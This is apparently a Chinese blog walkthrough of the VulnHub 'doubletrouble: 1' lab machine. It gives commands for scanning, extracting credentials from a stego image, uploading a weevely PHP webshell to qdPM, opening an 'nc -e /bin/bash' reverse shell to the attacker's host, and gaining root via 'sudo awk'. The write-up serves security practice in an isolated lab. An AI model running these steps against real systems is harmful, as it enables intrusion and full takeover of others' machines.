vulnhyb:doubletrouble: 1

1.环境搭建

靶机下载:doubletrouble: 1 ~ VulnHub

2.渗透过程

将靶机网络改为仅主机模式,和kali虚机使用一个网卡

开启靶机

在kali中使用nmap -sn 扫描开启的虚机

nmap -sn 192.168.56.0/24

发现靶机IP地址,使用nmap -sS 扫描靶机

nmap -sS 192.168.56.107

使用浏览器访问靶机80端口

http://192.168.56.107

发现是qdPM 9.1,先使用dirb扫描web目录

dirb http://192.168.56.107

发现secret,uploads目录,浏览器访问secret

http://192.168.56.107/secret

发现一张图片,使用wget下载图片,这图片中可以有提示

wget http://192.168.56.107/secret/doubletrouble.jpg

这图片是stegtseek加密的图片,使用工具进行爆破

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output

查看output文件

cat output

得到用户名和密码,在浏览器中登陆

登陆成功,在页面中存在一个文件上传漏洞

使用kali中的weevely工具生成木马文件

weevely generate 666 shell.php

上传文件显示失败

在浏览器中查看一下uplaods目录中的文件

发现出存在刚刚上传的文件,使用weevely工具进行连接

weevely http://192.168.56.107/uploads/users/508828-shell.php

连接成功使用nc工具监听6666端口

nc -lvp 6666

使用nc工具进行反弹shell

nc -e /bin/bash 192.168.56.101 6666

使用python3命令,进行python交互

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看权限

sudo -l

发现使用的是awk(文本分析工具),进行提权

sudo awk 'BEGIN {system("/bin/bash")}'

提权成功

id

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值